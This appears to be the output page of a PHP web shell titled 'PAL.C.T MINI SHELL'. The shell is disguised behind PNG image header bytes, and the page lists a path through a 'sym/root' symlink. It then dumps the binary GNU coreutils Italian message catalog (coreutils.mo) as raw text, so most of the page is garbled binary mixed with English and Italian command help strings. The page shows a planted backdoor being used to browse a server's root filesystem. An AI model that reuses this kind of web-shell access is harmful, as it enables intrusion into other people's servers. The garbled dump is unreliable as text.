php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/it/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/it/LC_MESSAGES/coreutils.mo

r<	  Gp!"ps#!#%w%5;'Tq(G(8)G)#)z
++^,|s--A.//0E11\2C3U4"5y5Fy6T658K8)j9:I;<=>?]@NAZ#BW~BBC4BDfwEFGqI=]JK%yL
LL,MXN|PQRS^T]UjUsU	yUUUU UUU>VJViV,{V$VV/VW2WQWnWW'WWWW
X$X7X'VX~XXX"XX"XY*Y7YIY.ZY"Y+YYYY
ZZ ZK(Z8tZZ:d\\2]]:]1]]	^0^7?^w^|^^^^^^^o_/``	``h`w4aab;6c%rc	c8c@c1d-Nd*|ddAdd&de&2e Ye'ze0e e)eYfTxf'ff&	g0g#GgkgTgggGh.hh+iYHi=i*ij )j!Jj lj'jj	okyk~kkkkk*kkk2k1*l\l!hlll*ll"lm8m#Wm#{m,m0m,m#*nNnin nnnnno$-o'Rozooooo(op*p.?p2nppp0p3q5:q*pqqqqqqr8rSrqr.rrrrrs!s6sOsjs%ss
sssstt	.t8tIt#Ot*st'tt$t#
u%.uTutu.yuuDuv#v@v\vyvv=v@v:wQwow;wwww#x
)x7xHx_x~xxxxxxxy(,yUybyryxy
y$y!y"y#z7%z=]zCzz	zz {
5{@{`{
x{
{{{{	{	{{{|7 |X|_|n|~|
|||N|f}>n}@}<}+~1~3I~}~~~H~&067gt
5,U*

Ā~ҀQN+]݄;nYte9p\NmHqv9֑hNcEוE*ՙ~H%n?4fAliVUZڨT5`SVjʮ
&v
[%IoL;BOX	]gs!!ѽI+Z>. 91!k%"ҿ6"Cf+CBWq#1
(6<'s0)	Q&;xF{--+
1 LR	xy1[@&	 ;*Of@/,'TI\.$$:/_(W?.$n&"S$kx-i*W=8+v"!%'M(/4DJR7T89'*6a {B%+&1*X0.9=9[0"&."L%o&',6"Hk-+?"?b=A$"%?HAG:'M(u!L$c 5%!(;.d!$,
ESb&	+1F1x'(,'(%Pv>{&_$A!f$%WINH6T+*$.*S!~*(+E8q4&.$U/zBgYU
+$#Hb
t	C2v} dzJMGB[?!8QR2H< t]J3)4]R,_C(3*d8}Q+s?&otf@qZ4;jKXFqp0L!h|<"RJ+iIh'9j4'6MO.C`JTLkW
N (>E	[`mVoS);0V8-wd1	7/9,g )-B@el!c:[ar##^EkYAO=_I^*.e&{f%U
?Py$FH/gB:G5
~u3]ADvXi21Z"n]aGDUSPbcNzKxnH57M
6>$mTQ=2%Y\\Wrb<lp
  ( EXPRESSION )               EXPRESSION is true
  ! EXPRESSION                 EXPRESSION is false
  EXPRESSION1 -a EXPRESSION2   both EXPRESSION1 and EXPRESSION2 are true
  EXPRESSION1 -o EXPRESSION2   either EXPRESSION1 or EXPRESSION2 is true

  -a, --all         same as -b -d --login -p -r -t -T -u
  -b, --boot        time of last system boot
  -d, --dead        print dead processes
  -H, --heading     print line of column headings

  -b FILE     FILE exists and is block special
  -c FILE     FILE exists and is character special
  -d FILE     FILE exists and is a directory
  -e FILE     FILE exists

  -l              produce long format output for the specified USERs
  -b              omit the user's home directory and shell in long format
  -h              omit the user's project file in long format
  -p              omit the user's plan file in long format
  -s              do short format output, this is the default

  ARG1 * ARG2       arithmetic product of ARG1 and ARG2
  ARG1 / ARG2       arithmetic quotient of ARG1 divided by ARG2
  ARG1 % ARG2       arithmetic remainder of ARG1 divided by ARG2

  ARG1 + ARG2       arithmetic sum of ARG1 and ARG2
  ARG1 - ARG2       arithmetic difference of ARG1 and ARG2

  ARG1 < ARG2       ARG1 is less than ARG2
  ARG1 <= ARG2      ARG1 is less than or equal to ARG2
  ARG1 = ARG2       ARG1 is equal to ARG2
  ARG1 != ARG2      ARG1 is unequal to ARG2
  ARG1 >= ARG2      ARG1 is greater than or equal to ARG2
  ARG1 > ARG2       ARG1 is greater than ARG2

  FILE1 -ef FILE2   FILE1 and FILE2 have the same device and inode numbers
  FILE1 -nt FILE2   FILE1 is newer (modification date) than FILE2
  FILE1 -ot FILE2   FILE1 is older than FILE2

  INTEGER1 -eq INTEGER2   INTEGER1 is equal to INTEGER2
  INTEGER1 -ge INTEGER2   INTEGER1 is greater than or equal to INTEGER2
  INTEGER1 -gt INTEGER2   INTEGER1 is greater than INTEGER2
  INTEGER1 -le INTEGER2   INTEGER1 is less than or equal to INTEGER2
  INTEGER1 -lt INTEGER2   INTEGER1 is less than INTEGER2
  INTEGER1 -ne INTEGER2   INTEGER1 is not equal to INTEGER2

  STRING : REGEXP   anchored pattern match of REGEXP in STRING

  match STRING REGEXP        same as STRING : REGEXP
  substr STRING POS LENGTH   substring of STRING, POS counted from 1
  index STRING CHARS         index in STRING where any CHARS is found, or 0
  length STRING              length of STRING

A lightweight `finger' program;  print user information.
The utmp file will be %s.

A mere - implies -i.  If no COMMAND, print the resulting environment.

A mere - implies -l.   If USER not given, assume root.

As a special case, cp makes a backup of SOURCE when the force and backup
options are given and SOURCE and DEST are the same name for an existing,
regular file.

Beware that many operators need to be escaped or quoted for shells.
Comparisons are arithmetic if both ARGs are numbers, else lexicographical.
Pattern matches return the string matched between \( and \) or null; if
\( and \) are not used, they return the number of characters matched or 0.

Combination settings:
 * [-]LCASE      same as [-]lcase
   cbreak        same as -icanon
   -cbreak       same as icanon

Control settings:
   [-]clocal     disable modem control signals
   [-]cread      allow input to be received
 * [-]crtscts    enable RTS/CTS handshaking
   csN           set character size to N bits, N in [5..8]

Handle the tty line connected to standard input.  Without arguments,
prints baud rate, line discipline, and deviations from stty sane.  In
settings, CHAR is taken literally, or coded as in ^c, 0x37, 0177 or
127; special values ^- or undef used to disable special characters.

If FILE is not specified, use %s.  %s as FILE is common.
If ARG1 ARG2 given, -m presumed: `am i' or `mom likes' are usual.

If FILE is specified, read it to determine which colors to use for which
file types and extensions.  Otherwise, a precompiled database is used.
For details on the format of these files, run `dircolors --print-database'.

If no command is given, run ``${SHELL} -i'' (default: /bin/sh).

Input settings:
   [-]brkint     breaks cause an interrupt signal
   [-]icrnl      translate carriage return to newline
   [-]ignbrk     ignore break characters
   [-]igncr      ignore carriage return

Local settings:
   [-]crterase   echo erase characters as backspace-space-backspace
 * crtkill       kill all line by obeying the echoprt and echoe settings
 * -crtkill      kill all line by obeying the echoctl and echok settings

Note that if you use rm to remove a file, it is usually possible to recover
the contents of that file.  If you want more assurance that the contents are
truly unrecoverable, consider using shred.

Note that the -d and -t options accept different time-date formats.

Optional - before SETTING indicates negation.  An * marks non-POSIX
settings.  The underlying system defines which settings are available.

Output settings:
 * bsN           backspace delay style, N in [0..1]
 * crN           carriage return delay style, N in [0..3]
 * ffN           form feed delay style, N in [0..1]
 * nlN           newline delay style, N in [0..1]

Print the value of EXPRESSION to standard output.  A blank line below
separates increasing precedence groups.  EXPRESSION may be:

  ARG1 | ARG2       ARG1 if it is neither null nor 0, otherwise ARG2

  ARG1 & ARG2       ARG1 if neither argument is null or 0, otherwise 0

Special characters:
 * dsusp CHAR    CHAR will send a terminal stop signal once input flushed
   eof CHAR      CHAR will send an end of file (terminate the input)
   eol CHAR      CHAR will end the line

The backup suffix is `~', unless set with --suffix or SIMPLE_BACKUP_SUFFIX.
The version control method may be selected via the --backup option or through
the VERSION_CONTROL environment variable.  Here are the values:


To remove a file whose name starts with a `-', for example `-foo',
use one of these commands:
  %s -- -foo

  %s ./-foo

Without any OPTION, print some useful set of identified information.
      --from=CURRENT_OWNER:CURRENT_GROUP
                         change the owner and/or group of each file only if
                         its current owner and/or group match those specified
                         here.  Either may be omitted, in which case a match
                         is not required for the omitted attribute.
      --version  output version information and exit
   -evenp        same as -parenb cs8
 * [-]lcase      same as xcase iuclc olcuc
   litout        same as -parenb -istrip -opost cs8
   -litout       same as parenb istrip opost cs7
   nl            same as -icrnl -onlcr
   -nl           same as icrnl -inlcr -igncr onlcr -ocrnl -onlret
   [-]cstopb     use two stop bits per character (one with `-')
   [-]hup        send a hangup signal when the last process closes the tty
   [-]hupcl      same as [-]hup
   [-]parenb     generate parity bit in output and expect parity bit in input
   [-]parodd     set odd parity (even with `-')
   [-]ignpar     ignore characters with parity errors
 * [-]imaxbel    beep and do not flush a full input buffer on a character
   [-]inlcr      translate newline to carriage return
   [-]inpck      enable input parity checking
   [-]istrip     clear high (8th) bit of input characters
   [-]isig       enable interrupt, quit, and suspend special characters
   [-]noflsh     disable flushing after interrupt and quit special characters
 * [-]prterase   same as [-]echoprt
 * [-]tostop     stop background jobs that try to write to the terminal
 * [-]xcase      with icanon, escape with `\' for uppercase characters
   cooked        same as brkint ignpar istrip icrnl ixon opost isig
                 icanon, eof and eol characters to their default values
   -cooked       same as raw
   crt           same as echoe echoctl echoke
   dec           same as echoe echoctl echoke -ixany intr ^c erase 0177
                 kill ^u
 * [-]decctlq    same as [-]ixany
   ek            erase and kill characters to their default values
   evenp         same as parenb -parodd cs7
   ispeed N      set the input speed to N
 * line N        use line discipline N
   min N         with -icanon, set N characters minimum for a completed read
   ospeed N      set the output speed to N
   oddp          same as parenb parodd cs7
   -oddp         same as -parenb cs8
   [-]parity     same as [-]evenp
   pass8         same as -parenb -istrip cs8
   -pass8        same as parenb istrip cs7
   raw           same as -ignbrk -brkint -ignpar -parmrk -inpck -istrip
                 -inlcr -igncr -icrnl  -ixon  -ixoff  -iuclc  -ixany
                 -imaxbel -opost -isig -icanon -xcase min 1 time 0
   -raw          same as cooked
   stop CHAR     CHAR will stop the output
   susp CHAR     CHAR will send a terminal stop signal
 * swtch CHAR    CHAR will switch to a different shell layer
 * werase CHAR   CHAR will erase the last word typed
  %h   same as %b
  %H   hour (00..23)
  %I   hour (01..12)
  %j   day of year (001..366)
  %k   hour ( 0..23)
  %l   hour ( 1..12)
  %m   month (01..12)
  %M   minute (00..59)
  + TOKEN                    interpret TOKEN as a string, even if it is a
                               keyword like `match' or an operator like `/'

  ( EXPRESSION )             value of EXPRESSION
  -T, -w, --mesg    add user's message status as +, - or ?
  -u, --users       list users logged in
      --message     same as -T
      --writable    same as -T
  -f              omit the line of column headings in short format
  -w              omit the user's full name in short format
  -i              omit the user's full name and remote host in short format
  -q              omit the user's full name, remote host and idle time
                  in short format
  -l                         use a long listing format
  -L, --dereference          when showing file information for a symbolic
                               link, show information for the file the link
                               references rather than for the link itself
  -m                         fill width with a comma separated list of entries
  -q, --count       all login names and number of users logged on
  -r, --runlevel    print current runlevel
  -s, --short       print only name, line, and time (default)
  -t, --time        print last system clock change
  -q, --hide-control-chars   print ? instead of non graphic characters
      --show-control-chars   show non graphic characters as-is (default
                             unless program is `ls' and output is a terminal)
  -Q, --quote-name           enclose entry names in double quotes
      --quoting-style=WORD   use quoting style WORD for entry names:
                               literal, locale, shell, shell-always, c, escape
  -s, --signal=SIGNAL, -SIGNAL
                   specify the name or number of the signal to be sent
  -l, --list       list signal names, or convert signal names to/from numbers
  -t, --table      print a table of signal information
  -u, --update                 copy only when the SOURCE file is newer
                                 than the destination file or when the
                                 destination file is missing
  -v, --verbose                explain what is being done
  -x, --one-file-system        stay on this file system
  none, off       never make backups (even if --backup is given)
  numbered, t     make numbered backups
  existing, nil   numbered if numbered backups exist, simple otherwise
  simple, never   always make simple backups
 %4s-blocks      Used Available Use%% (backup: %s) * [-]ctlecho    echo control characters in hat notation (`^c')
   [-]echo       echo input characters
 * [-]echoctl    same as [-]ctlecho
   [-]echoe      same as [-]crterase
   [-]echok      echo a newline after a kill character
 * [-]echoke     same as [-]crtkill
   [-]echonl     echo newline even if not echoing other characters
 * [-]echoprt    echo erased characters backward, between `\' and '/'
   [-]icanon     enable erase, kill, werase, and rprnt special characters
   [-]iexten     enable non-POSIX special characters
 * [-]iuclc      translate uppercase characters to lowercase
 * [-]ixany      let any character restart output, not only start character
   [-]ixoff      enable sending of start/stop characters
   [-]ixon       enable XON/XOFF flow control
   [-]parmrk     mark parity errors (with a 255-0-character sequence)
   [-]tandem     same as [-]ixoff
 * [-]ocrnl      translate carriage return to newline
 * [-]ofdel      use delete characters for fill instead of null characters
 * [-]ofill      use fill (padding) characters instead of timing for delays
 * [-]olcuc      translate lowercase characters to uppercase
 * [-]onlcr      translate newline to carriage return-newline
 * [-]onlret     newline performs a carriage return
 * [-]onocr      do not print carriage returns in the first column
   [-]opost      postprocess output
 * tabN          horizontal tab delay style, N in [0..3]
 * tabs          same as tab0
 * -tabs         same as tab3
 * vtN           vertical tab delay style, N in [0..1]
 * eol2 CHAR     alternate CHAR for ending the line
   erase CHAR    CHAR will erase the last character typed
   intr CHAR     CHAR will send an interrupt signal
   kill CHAR     CHAR will erase the current line
 * lnext CHAR    CHAR will enter the next character quoted
   quit CHAR     CHAR will send a quit signal
 * rprnt CHAR    CHAR will redraw the current line
   start CHAR    CHAR will restart the output after stopping it
 * rows N        tell the kernel that the terminal has N rows
 * size          print the number of rows and columns according to the kernel
   speed         print the terminal speed
   time N        with -icanon, set read timeout of N tenths of a second
 Mounted on
 groups= old %b %e  %Y%b %e %H:%M%s -> %s (unbackup)
%s and %s are the same file%s exists but is not a directory%s has unknown file type%s: No such user%s: can make relative symbolic links only in current directory%s: cannot overwrite directory%s: cannot rewind%s: cannot shred append-only file descriptor%s: couldn't reset non-blocking mode%s: descend into directory %s? %s: descend into write-protected directory %s? %s: error truncating%s: error writing at offset %s%s: expected a numeric value%s: file has negative size%s: file too large%s: hard link not allowed for directory%s: invalid file size%s: invalid file type%s: invalid number of passes%s: invalid process id%s: invalid signal%s: multiple signals specified%s: no size information for this device%s: overwrite %s? %s: pass %lu/%lu (%s)...%s: pass %lu/%lu (%s)...%s%s: pass %lu/%lu (%s)...%s/%s %d%%%s: remove %s %s? %s: remove write-protected %s %s? %s: removed%s: removing%s: renamed to %s%s: replace %s? %s: unable to perform all requested operations%s: value not completely converted%s:%lu: invalid line;  missing second token%s:%lu: unrecognized keyword %s',  load average: %.2f<internal>???
COMMENTCall the link function to create a link named FILE2 to an existing FILE1.

Call the unlink function to remove the specified FILE.

Change the effective user id and group id to that of USER.

  -, -l, --login               make the shell a login shell
  -c, --command=COMMAND        pass a single COMMAND to the shell with -c
  -f, --fast                   pass -f to the shell (for csh or tcsh)
  -m, --preserve-environment   do not reset environment variables
  -p                           same as -m
  -s, --shell=SHELL            run SHELL if /etc/shells allows it
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.

Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
Create named pipes (FIFOs) with the given NAMEs.

Create the DIRECTORY(ies), if they do not already exist.

Create the special file NAME of the given TYPE.

Directory: EXITExit with the status determined by EXPRESSION.

Force changed blocks to disk, update the super block.

IDLEIdleIn real life: LINELoginLogin name: NAMEOutput commands to set the LS_COLORS environment variable.

Determine format of output:
  -b, --sh, --bourne-shell    output Bourne shell code to set LS_COLORS
  -c, --csh, --c-shell        output C shell code to set LS_COLORS
  -p, --print-database        output defaults
Output who is currently logged in according to FILE.
If FILE is not specified, use %s.  %s as FILE is common.

Overwrite the specified FILE(s) repeatedly, in order to make it harder
for even very expensive hardware probing to recover the data.

PIDPassword:Plan:
Print NAME with any leading directory components removed.
If specified, also remove a trailing SUFFIX.

Print NAME with its trailing /component removed; if NAME contains no /'s,
output `.' (meaning the current directory).

Print or change terminal characteristics.

  -a, --all          print all current settings in human-readable form
  -g, --save         print all current settings in a stty-readable form
  -F, --file=DEVICE  open and use the specified DEVICE instead of stdin
Print the file name of the terminal connected to standard input.

  -s, --silent, --quiet   print nothing, only return an exit status
Print the full filename of the current working directory.

Print the name of the current user.

Project: Rename SOURCE to DEST, or move SOURCE(s) to DIRECTORY.

Repeatedly output a line with all specified STRING(s), or `y'.

Run COMMAND with root directory set to NEWROOT.

Send signals to processes, or list signals.

Set LC_ALL='C' to work around the problem.Shell: Summarize disk usage of each FILE, recursively for directories.

TIMETry `%s --help' for more information.
Unknown system errorUsage: %s EXPRESSION
  or:  %s OPTION
Usage: %s FILE
  or:  %s OPTION
Usage: %s FILE1 FILE2
  or:  %s OPTION
Usage: %s FORMAT [ARGUMENT]...
  or:  %s OPTION
Usage: %s NAME
  or:  %s OPTION
Usage: %s NAME [SUFFIX]
  or:  %s OPTION
Usage: %s [-s SIGNAL | -SIGNAL] PID...
  or:  %s -l [SIGNAL]...
  or:  %s -t [SIGNAL]...
Usage: %s [NAME]
  or:  %s OPTION
Print or set the hostname of the current system.

Usage: %s [NUMBER]...
  or:  %s OPTION
Usage: %s [OPTION]
Usage: %s [OPTION] [COMMAND [ARG]...]
Usage: %s [OPTION]...
Usage: %s [OPTION]... DIRECTORY...
Usage: %s [OPTION]... FILE...
Usage: %s [OPTION]... GROUP FILE...
  or:  %s [OPTION]... --reference=RFILE FILE...
Usage: %s [OPTION]... LAST
  or:  %s [OPTION]... FIRST LAST
  or:  %s [OPTION]... FIRST INCREMENT LAST
Usage: %s [OPTION]... MODE[,MODE]... FILE...
  or:  %s [OPTION]... OCTAL-MODE FILE...
  or:  %s [OPTION]... --reference=RFILE FILE...
Usage: %s [OPTION]... NAME TYPE [MAJOR MINOR]
Usage: %s [OPTION]... NAME...
Usage: %s [OPTION]... [ FILE | ARG1 ARG2 ]
Usage: %s [OPTION]... [+FORMAT]
  or:  %s [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
Usage: %s [OPTION]... [-] [NAME=VALUE]... [COMMAND [ARG]...]
Usage: %s [OPTION]... [-] [USER [ARG]...]
Usage: %s [OPTION]... [FILE]
Usage: %s [OPTION]... [FILE]...
Usage: %s [OPTION]... [USERNAME]
Usage: %s [OPTION]... [USER]...
Usage: %s [STRING]...
  or:  %s OPTION
WARNING: Circular directory structure.
This almost certainly means that you have a corrupted file system.
NOTIFY YOUR SYSTEM MANAGER.
The following directory is part of the cycle:
  %s
Warning: WhenWhereWritten by %s.
^[nN]^[yY]`a command must be given with an adjustmentaccessing %sambiguous argument %s for %sbacking up %s would destroy source;  %s not copiedbacking up %s would destroy source;  %s not movedbackup typeblock special files not supportedcannot access %scannot backup %scannot both summarize and show all entriescannot change permissions of %scannot change root directory to %scannot change to directory %scannot chdir to root directorycannot combine signal with -l or -tcannot compare file names %s and %scannot convert U+%04X to local character setcannot convert U+%04X to local character set: %scannot copy a directory, %s, into itself, %scannot copy cyclic symbolic link %scannot create directory %scannot create fifo %scannot create hard link %s to %scannot create link %scannot create link %s to %scannot create regular file %scannot create special file %scannot create symbolic link %scannot create symbolic link %s to %scannot determine device and inode of %scannot determine hostnamecannot fstat %scannot get current directorycannot get system namecannot lseek %scannot make both hard and symbolic linkscannot make directory %scannot move %s to %scannot move %s to a subdirectory of itself, %scannot move directory onto non-directory: %s -> %scannot open %s for readingcannot open directory %scannot overwrite directory %s with non-directorycannot overwrite non-directory %s with directory %scannot print only names or real IDs in default formatcannot read file system information for %scannot read realtime clockcannot read symbolic link %scannot remove %scannot set datecannot set group idcannot set groupscannot set hostname; this system lacks the functionalitycannot set time stamps for %scannot set user idcannot specify times from more than one sourcecannot stat %scannot un-backup %scannot unlink %schanged group of %s to %s
changed ownership of %s to %s
changing group of %schanging ownership of %schanging permissions of %scharacter out of rangecharacter special files not supportedclock changeclosing %sclosing input file %sclosing output file %scouldn't get boot timecreated directory %screating directory %sdirectorydivision by zeroexit=failed to change group of %s to %s
failed to change mode of %s to %04lo (%s)
failed to change ownership of %s to %s
failed to get attributes of %sfailed to preserve authorship for %sfailed to preserve ownership for %sfailed to preserve permissions for %sfailed to preserve times for %sfifofile system type %s both selected and excludedfork system call failedformat string may not be specified when printing equal width stringsgetpass: cannot open /dev/ttygetting new attributes of %sgroup of %s retained as %s
iconv function not availableiconv function not usableid=ignoring invalid tab size in environment variable TABSIZE: %signoring invalid value of environment variable QUOTING_STYLE: %signoring invalid width in environment variable COLUMNS: %signoring non-option argumentsincorrect passwordinter-device move failed: %s to %s; unable to remove targetinvalid argument %s for %sinvalid date format %sinvalid device %s %sinvalid floating point argument: %sinvalid groupinvalid group %sinvalid line width: %sinvalid major device number %sinvalid maximum depth %sinvalid minor device number %sinvalid modeinvalid mode %sinvalid number %sinvalid option -- %cinvalid tab size: %sinvalid time style format %sinvalid universal character name \%c%0*xinvalid userinvalid user %slast=memory exhaustedmessage queuemissing hexadecimal number in escapemode of %s changed to %04lo (%s)
mode of %s retained as %04lo (%s)
multiple -l or -t options specifiedneither symbolic link %s nor referent has been changed
no SHELL environment variable, and no shell type option givenno username specified; at least one must be specified when using -lnon-numeric argumentnot a ttyomitting directory %sonly one device may be specifiedopening %sownership of %s retained as %s
preserving times for %sread errorreading %sremoved %s
removed directory: %s
removing directory, %srun-levelsemaphoresetting permissions for %ssetting times of %sshared memory objectskipping file %s, as it was replaced while being copiedsocketstandard inputstandard outputstring comparison failedsymbolic linksyntax errorterm=the options for verbose and stty-readable output styles are
mutually exclusivethe options to output dircolors' internal database and
to select a shell syntax are mutually exclusivethe options to print and set the time may not be used togetherthe options to specify dates for printing are mutually exclusivethe strip option may not be used when installing a directorytotalunknown binary operatorunparsable value for LS_COLORS environment variableunrecognized prefix: %suser %s does not existusing restricted shell %swarning: %s: character(s) following character constant have been ignoredwarning: cannot change directory to %swarning: source file %s specified more than oncewarning: summarizing is the same as using --max-depth=0warning: working around lseek kernel bug for file (%s)
  of mt_type=0x%0lx -- see <sys/mtio.h> for the list of typesweird filewhen specifying an output style, modes may not be setwill not create hard link %s to directory %swill not overwrite just-created %s with %swrite errorwriting %swriting to %sProject-Id-Version: coreutils 4.5.1
Report-Msgid-Bugs-To: bug-coreutils@gnu.org
POT-Creation-Date: 2010-01-13 22:03+0100
PO-Revision-Date: 2002-07-24 18:12+0200
Last-Translator: Marco d'Itri <md@linux.it>
Language-Team: Italian <tp@lists.linux.it>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8-bit
Plural-Forms: nplurals=2; plural=(n != 1);

  ( ESPRESSIONE )               ESPRESSIONE è vera
  ! ESPRESSIONE                 ESPRESSIONE è falsa
  ESPRESSIONE1 -a ESPRESSIONE2  sia ESPRESSIONE1 che ESPRESSIONE2 sono vere
  ESPRESSIONE1 -o ESPRESSIONE2  o ESPRESSIONE1 o ESPRESSIONE2 è vera

  -a, --all         come -b -d --login -p -r -t -T -u
  -b, --boot        orario dell'ultimo boot del sistema
  -d, --dead        stampa i processi morti
  -H, --heading     stampa la riga di intestazione delle colonne

  -b FILE     FILE esiste ed è speciale a blocchi
  -c FILE     FILE esiste ed è speciale a caratteri
  -d FILE     FILE esiste ed è una directory
  -e FILE     FILE esiste

  -l              usa il formato di output lungo per gli UTENTI indicati
  -b              omette l'home directory e la shell nel formato lungo
  -h              omette il file project dell'utente nel formato lungo
  -p              omette il file plan dell'utente nel formato lungo
  -s              usa il formato breve, è l'opzione predefinita

  ARG1 * ARG2       prodotto aritmetico di ARG1 e ARG2
  ARG1 / ARG2       quoziente aritmetico di ARG1 diviso ARG2
  ARG1 % ARG2       resto aritmetico di ARG1 diviso ARG2

  ARG1 + ARG2       somma aritmetica di ARG1 e ARG2
  ARG1 - ARG2       differenza aritmetica di ARG1 e ARG2

  ARG1 < ARG2       ARG1 è minore di ARG2
  ARG1 <= ARG2      ARG1 è minore o uguale di ARG2
  ARG1 = ARG2       ARG1 è uguale ad ARG2
  ARG1 != ARG2      ARG1 è diverso da ARG2
  ARG1 >= ARG2      ARG1 è maggiore o uguale di ARG2
  ARG1 > ARG2       ARG1 è maggiore di ARG2

  FILE1 -ef FILE2   FILE1 e FILE2 hanno gli stessi numeri di device e di inode
  FILE1 -nt FILE2   FILE1 è più nuovo (data di modifica) di FILE2
  FILE1 -ot FILE2   FILE1 è più vecchio FILE2

  INTERO1 -eq INTERO2      INTERO1 è uguale INTERO2
  INTERO1 -ge INTERO2      INTERO1 è maggiore o uguale a INTERO2
  INTERO1 -gt INTERO2      INTERO1 è maggiore di INTERO2
  INTERO1 -le INTERO2      INTERO1 è minore o uguale a INTERO2
  INTERO1 -lt INTERO2      INTERO1 è minore di INTERO2
  INTERO1 -ne INTERO2      INTERO1 non è uguale a INTERO2

  STRINGA : REGEXP   ricerca ancorata del modello REGEXP nella STRINGA

  match STRINGA REGEXP       come STRINGA : REGEXP
  substr STRINGA POS LUNG    sottostringa della STRINGA, POS è contata da 1
  index STRINGA CAR          posizione nella STRINGA di uno dei CAR, se
                             trovato, o 0
  length STRINGA             lunghezza della STRINGA

Una versione leggera di `finger'; stampa informazioni sugli utenti.
Il file utmp sarà %s.

Un semplice - implica -i. Se manca il COMANDO, stampa l'ambiente risultante.

Un semplice - implica -l. Se non è specificato l'UTENTE, assume root.

Come caso particolare, cp fa un backup di ORIGINE quando sono usate le opzioni
force e backup e ORIGINE e DEST sono lo stesso nome di un file normale già
esistente.

Si noti che molti operatori devono essere preceduti da `\' (escaped) o
protetti da apici a causa delle shell. I confronti sono aritmetici se
entrambi gli ARG sono numeri, altrimenti sono lessicografici. I modelli
restituiscono la stringa corrispondente tra \( e \) oppure nulla; se
\( e \) non sono usati, restituiscono il numero di caratteri corrispondenti
oppure 0.

Impostazioni combinazione:
 * [-]LCASE      come [-]lcase
   cbreak        come -icanon
   -cbreak       come icanon

Impostazioni di controllo:

   [-]clocal     disabilita i segnali di controllo del modem
   [-]cread      permette la ricezione dell'input
 * [-]crtscts    abilita l'handshaking RTS/CTS
   csN           imposta a N bit la dimensione dei caratteri, N tra 5 e 8

Gestisce la linea tty connessa allo standard input. Senza argomenti stampa
il baud rate, la disciplina di linea, e le differenze da stty sane. Nelle
impostazioni, CAR è preso letteralmente o codificato come in ^c, 0x37, 0177
o 127; i valori speciali ^- o undef sono usati per disabilitare i caratteri
speciali.

Se il FILE non è specificato, usa %s. È comune usare %s come FILE.
Se sono dati ARG1 e ARG2, è assunto -m: `am i' o `mom likes' sono comuni.

Se FILE è specificato viene letto per determinare quali colori usare per i
diversi tipi di file ed estensioni. Altrimenti è usato un database
precompilato. Per conoscere i dettagli sul formato di questi file eseguire
`dircolors --print-database'.

Se non è dato alcun comando, lancia ``${SHELL} -i'' (predefinita: /bin/sh).

Impostazioni dell'input:

   [-]brkint     i break causano un segnale di interrupt
   [-]icrnl      converte carriage return in newline
   [-]ignbrk     ignora i caratteri di break
   [-]igncr      ignora carriage return

Impostazioni locali:
   [-]crterase   fa l'echo dei caratteri di erase come
                 backspace-spazio-backspace
 * crtkill       cancella tutte le righe obbedendo alle impostazioni
                 echoprt e echoe
 * -crtkill      cancella tutte le righe obbedendo alle impostazioni
                 echoctl e echok

Notare che se si usa rm per rimuovere un file, di solito è impossibile
recuperarne il contenuto. Se si vogliono maggiori garanzie che il contenuto
sia veramente irrecuperabile si valuti l'uso di shred.

Nota che le opzioni -d e -t accettano differenti formati di orario.

Un - opzionale prima di un'IMPOSTAZIONE indica la negazione. Un * indica le
impostazioni non POSIX. Il sistema sottostante definisce quali impostazioni
sono disponibili.

Impostazioni dell'output:
 * bsN           stile del ritardo di backspace, N in [0..1]
 * crN           stile del ritardo di carriage return, N in [0..3]
 * ffN           stile del ritardo di form feed, N in [0..1]
 * nlN           stile del ritardo di newline, N in [0..1]

Stampa sullo standard output il valore dell'ESPRESSIONE. Qui sotto, una riga
vuota separa gruppi di operatori con precedenza crescente.
ESPRESSIONE può essere:

  ARG1 | ARG2       ARG1 se non è nullo o 0, altrimenti ARG2

  ARG1 & ARG2       ARG1 se nessun argomento è nullo o 0, altrimenti 0

Caratteri speciali:
 * dsusp CAR     CAR invierà un segnale di stop del terminale dopo il flush
                 dell'input
   eof CAR       CAR invierà un end of file (termina l'input)
   eol CAR       CAR terminerà la riga

Il suffisso dei backup è ~, a meno che sia impostato con --suffix oppure
SIMPLE_BACKUP_SUFFIX. Il metodo di controllo di versione può essere scelto
con l'opzione --backup o la variabile di ambiente VERSION_CONTROL. I valori
sono:


Per rimuovere un file il cui nome inizia con `-', per esempio `-foo',
usare uno di questi comandi:
  %s -- -foo

  %s ./-foo

Senza alcuna OPZIONE, stampa alcune utili informazioni identificative.
      --from=ATTUALE_PROPRIETARIO:ATTUALE_GRUPPO
                         cambia il proprietario e/o il gruppo di ogni file
                         solo se il suo attuale proprietario e/o gruppo
                         corrisponde a quello specificato qui. Ciascuno può
                         essere omesso, e in questo caso non è richiesto che
                         corrisponda.
      --version  stampa le informazioni sulla versione ed esce
   -evenp        come -parenb cs8
 * [-]lcase      come xcase iuclc olcuc
   litout        come -parenb -istrip -opost cs8
   -litout       come parenb istrip opost cs7
   nl            come -icrnl -onlcr
   -nl           come icrnl -inlcr -igncr onlcr -ocrnl -onlret
   [-]cstopb     usa due bit di stop per carattere (uno con `-')
   [-]hup        invia un signal di hangup quando l'ultimo processo chiude
                 il tty
   [-]hupcl      come [-]hup
   [-]parenb     genera un bit di parità in output e aspetta un bit di parità
                 in input
   [-]parodd     imposta la parità dispari (pari con `-')
   [-]ignpar     ignora i caratteri con errori di parità
 * [-]imaxbel    fa un beep e non fa il flush quando il buffer di input
                 completo riceve un carattere
   [-]inlcr      converte newline in carriage return
   [-]inpck      abilita il controllo di parità sull'input
   [-]istrip     azzera il bit più alto (l'ottavo) dei caratteri di input
   [-]isig       abilita i caratteri speciali interrupt, quit, e suspend
   [-]noflsh     disabilita il flushing dopo i caratteri speciali di
                 interrupt e quit
 * [-]prterase   come [-]echoprt
